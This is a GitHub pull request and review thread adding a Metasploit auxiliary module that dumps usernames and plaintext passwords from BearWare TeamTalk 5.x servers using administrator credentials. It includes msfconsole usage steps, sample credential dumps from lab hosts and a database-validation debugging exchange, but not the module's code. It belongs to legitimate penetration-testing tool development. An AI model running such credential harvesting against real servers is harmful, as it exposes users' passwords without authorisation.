### PR TITLE
Add TeamTalk Gather Credentials auxiliary module

### PR DESCRIPTION
**Pull request by bcoles**
This PR adds a post-auth credential dumping auxiliary module for BearWare TeamTalk versions 5.x.

        This module retrieves user credentials from BearWare TeamTalk.

        Valid administrator credentials are required.

        This module has been tested successfully on TeamTalk versions
        5.2.2.4885 and 5.2.3.4893.

## Verification

- [x] Start `msfconsole`
- [x] `use auxiliary/gather/teamtalk_creds`
- [x] `set rhost <RHOST>`
- [x] `set username <USERNAME>` (default: `admin`)
- [x] `set password <PASSWORD>` (default: `admin`)
- [x] `run`
- [x] **Verify** you get credentials

### Example Output

```
[*] 172.16.191.166:10333 - Found TeamTalk (protocol version 5.2)
[+] 172.16.191.166:10333 - Authenticated successfully
[+] 172.16.191.166:10333 - User is an administrator
[*] 172.16.191.166:10333 - Found 5 users

TeamTalk User Credentials
=========================

 Username  Password                     Type
 --------  --------                     ----
 debbie    1234567890                   1
 murphy    934txs                       2
 quinn     ~!@#$%^&*()_+{}|:" <>?;',./  2
 sparks    password                     2
 stormy                                 1

[+] 172.16.191.166:10333 - Credentials saved in: /root/.msf4/loot/20170724092809_default_172.16.191.166_teamtalk.user.cr_034806.txt
[*] Auxiliary module execution completed
```

## Installation

* [Download TeamTalk 5](http://bearware.dk/?page_id=353)

### CODE REVIEW

**Comment by pbarry-r7** [comment]
Cherry-picking this commit into current master (there appears to be an unrelated Metasploit Payloads error if I check out the PR branch) works as-expected for me if I disconnect my database (targeting TeamTalk v5.2.2 on Windows 8.1 x64):

```
msf > use auxiliary/gather/teamtalk_creds
msf auxiliary(teamtalk_creds) > set rhost 10.0.2.5
rhost => 10.0.2.5
msf auxiliary(teamtalk_creds) > set username adminjane
username => adminjane
msf auxiliary(teamtalk_creds) > set password secretjane
password => secretjane
msf auxiliary(teamtalk_creds) > run

[*] 10.0.2.5:10333 - Found TeamTalk (protocol version 5.2)
[+] 10.0.2.5:10333 - Authenticated successfully
[+] 10.0.2.5:10333 - User is an administrator
[*] 10.0.2.5:10333 - Found 2 users

TeamTalk User Credentials
=========================

 Username   Password    Type
 --------   --------    ----
 adminjane  secretjane  2
 bob        secretbob   1

[+] 10.0.2.5:10333 - Credentials saved in: /home/pbarry/.msf4/loot/20170816130544_default_10.0.2.5_teamtalk.user.cr_260751.txt
[*] Auxiliary module execution completed
msf auxiliary(teamtalk_creds) > cat /home/pbarry/.msf4/loot/20170816130544_default_10.0.2.5_teamtalk.user.cr_260751.txt
[*] exec: cat /home/pbarry/.msf4/loot/20170816130544_default_10.0.2.5_teamtalk.user.cr_260751.txt

Username,Password,Type
"adminjane","secretjane","2"
"bob","secretbob","1"
```

That said, if I have my db running, I hit an ActiveRecord validation error when running the module:

```
msf > use auxiliary/gather/teamtalk_creds
msf auxiliary(teamtalk_creds) > set rhost 10.0.2.5
rhost => 10.0.2.5
msf auxiliary(teamtalk_creds) > set username adminjane
username => adminjane
msf auxiliary(teamtalk_creds) > set password secretjane
password => secretjane
msf auxiliary(teamtalk_creds) > run

[*] 10.0.2.5:10333 - Found TeamTalk (protocol version 5.2)
[+] 10.0.2.5:10333 - Authenticated successfully
[+] 10.0.2.5:10333 - User is an administrator
[-] 10.0.2.5:10333 - Auxiliary failed: ActiveRecord::RecordInvalid Validation failed: Status is not included in the list
[-] 10.0.2.5:10333 - Call stack:
[-] 10.0.2.5:10333 -   /home/pbarry/.rvm/gems/ruby-2.4.1@metasploit-framework/gems/activerecord-4.2.9/lib/active_record/validations.rb:79:in `raise_record_invalid'
[-] 10.0.2.5:10333 -   /home/pbarry/.rvm/gems/ruby-2.4.1@metasploit-framework/gems/activerecord-4.2.9/lib/active_record/validations.rb:43:in `save!'
[-] 10.0.2.5:10333 -   /home/pbarry/.rvm/gems/ruby-2.4.1@metasploit-framework/gems/activerecord-4.2.9/lib/active_record/attribute_methods/dirty.rb:29:in `save!'
[-] 10.0.2.5:10333 -   /home/pbarry/.rvm/gems/ruby-2.4.1@metasploit-framework/gems/activerecord-4.2.9/lib/active_record/transactions.rb:291:in `block in save!'
[-] 10.0.2.5:10333 -   /home/pbarry/.rvm/gems/ruby-2.4.1@metasploit-framework/gems/activerecord-4.2.9/lib/active_record/transactions.rb:351:in `block in with_transaction_returning_status'
[-] 10.0.2.5:10333 -   /home/pbarry/.rvm/gems/ruby-2.4.1@metasploit-framework/gems/activerecord-4.2.9/lib/active_record/connection_adapters/abstract/database_statements.rb:213:in `block in transaction'
[-] 10.0.2.5:10333 -   /home/pbarry/.rvm/gems/ruby-2.4.1@metasploit-framework/gems/activerecord-4.2.9/lib/active_record/connection_adapters/abstract/transaction.rb:184:in `within_new_transaction'
[-] 10.0.2.5:10333 -   /home/pbarry/.rvm/gems/ruby-2.4.1@metasploit-framework/gems/activerecord-4.2.9/lib/active_record/connection_adapters/abstract/database_statements.rb:213:in `transaction'
[-] 10.0.2.5:10333 -   /home/pbarry/.rvm/gems/ruby-2.4.1@metasploit-framework/gems/activerecord-4.2.9/lib/active_record/transactions.rb:220:in `transaction'
[-] 10.0.2.5:10333 -   /home/pbarry/.rvm/gems/ruby-2.4.1@metasploit-framework/gems/activerecord-4.2.9/lib/active_record/transactions.rb:348:in `with_transaction_returning_status'
[-] 10.0.2.5:10333 -   /home/pbarry/.rvm/gems/ruby-2.4.1@metasploit-framework/gems/activerecord-4.2.9/lib/active_record/transactions.rb:291:in `save!'
[-] 10.0.2.5:10333 -   /home/pbarry/.rvm/gems/ruby-2.4.1@metasploit-framework/gems/metasploit-credential-2.0.12/lib/metasploit/credential/creation.rb:318:in `block in create_credential_login'
[-] 10.0.2.5:10333 -   /home/pbarry/.rvm/gems/ruby-2.4.1@metasploit-framework/gems/metasploit-credential-2.0.12/lib/metasploit/credential/creation.rb:621:in `retry_transaction'
[-] 10.0.2.5:10333 -   /home/pbarry/.rvm/gems/ruby-2.4.1@metasploit-framework/gems/metasploit-credential-2.0.12/lib/metasploit/credential/creation.rb:300:in `create_credential_login'
[-] 10.0.2.5:10333 -   /home/pbarry/metasploit-framework/lib/msf/core/auxiliary/report.rb:42:in `create_credential_login'
[-] 10.0.2.5:10333 -   /home/pbarry/metasploit-framework/modules/auxiliary/gather/teamtalk_creds.rb:159:in `report_cred'
[-] 10.0.2.5:10333 -   /home/pbarry/metasploit-framework/modules/auxiliary/gather/teamtalk_creds.rb:96:in `block in run'
[-] 10.0.2.5:10333 -   /home/pbarry/metasploit-framework/modules/auxiliary/gather/teamtalk_creds.rb:87:in `each_line'
[-] 10.0.2.5:10333 -   /home/pbarry/metasploit-framework/modules/auxiliary/gather/teamtalk_creds.rb:87:in `run'
```

My MSF db-fu is not strong, but I did try dropping+creating+migrating the db and still hit this error.  We definitely have other modules using status in the same way with login credentials, not sure if this might be a regression in framework or if my environment is broken.  Will poke some more...

**Comment by bcoles** [comment]
Thanks @pbarry-r7

I never (rarely) use the database in dev, so just copied the usual code pattern for this.

I reached basically the same conclusion before I saw your last paragraph:

Looking at the exception it seems to be complaining about `status` not being set for the credential object, however [the status is clearly set on line 154](https://github.com/rapid7/metasploit-framework/pull/8759/files#diff-f8b22b21edd8223d469a459e868f277bR154) in the same way as other modules.

**Comment by pbarry-r7** [comment]
Thx for the docs, @bcoles.  And it looks like status is set in create_credential_login() if it wasn't already set, leads to the same validation error if I remove the explicit set from your module.  I'd wager your code is fine and something else isn't working as expected.  :/

**Comment by pbarry-r7** [comment]
Hey @bcoles, looks like the create_credential_login() method in the [metasploit-credential gem](https://github.com/rapid7/metasploit-credential/blob/master/lib/metasploit/credential/creation.rb#L312) is specifically dropping the status of UNTRIED when the last_attempted_at date+time is set, triggering the record validation failure I hit above.  Guessing the thought is that saying you *tried* a credential at a particular date+time is useful but saying "I didn't try this (i.e. UNTRIED) at this date+time" is not of value (such that if the status is UNTRIED, then the last_attempted_at should be nil).  I verified this is what's happening in the code path and that by commenting out the `last_attempted_at = ...` line in your module that it works as-expected with a connected DB:

```
msf auxiliary(teamtalk_creds) > run

[*] 10.0.2.5:10333 - Found TeamTalk (protocol version 5.2)
[+] 10.0.2.5:10333 - Authenticated successfully
[+] 10.0.2.5:10333 - User is an administrator
[*] 10.0.2.5:10333 - Found 2 users

TeamTalk User Credentials
=========================

 Username   Password    Type
 --------   --------    ----
 adminjane  secretjane  2
 bob        secretbob   1

[+] 10.0.2.5:10333 - Credentials saved in: /home/pbarry/.msf4/loot/20170825143510_default_10.0.2.5_teamtalk.user.cr_063171.txt
[*] Auxiliary module execution completed
```

Additionally, a casual audit of some of the other framework modules using the same code pattern (and setting status to UNTRIED) shows they are not setting last_attempted_at.  You OK with removing the last_attempted_at assignment?  Always willing to entertain counter arguments, of course...  :)

**Comment by bcoles** [comment]
Thanks @pbarry-r7 that makes sense.

I guess my thinking was that it would be nice to have a date/time record of when the credentials were captured, even if they weren't tried.

I'll remove the `last_attempted_at` key.

A quick review of existing modules reveals the following modules make use of the same code pattern (using `last_attempted_at` in conjunction with `UNTRIED`)

* modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb
* modules/auxiliary/admin/http/nexpose_xxe_file_read.rb
* modules/auxiliary/admin/http/dlink_dsl320b_password_extractor.rb
* modules/auxiliary/gather/asterisk_creds.rb

**Comment by pbarry-r7** [comment]
# Release Notes

This new post-auth auxiliary module will gather TeamTalk credentials on servers running vulnerable versions.

**Pull request merged**
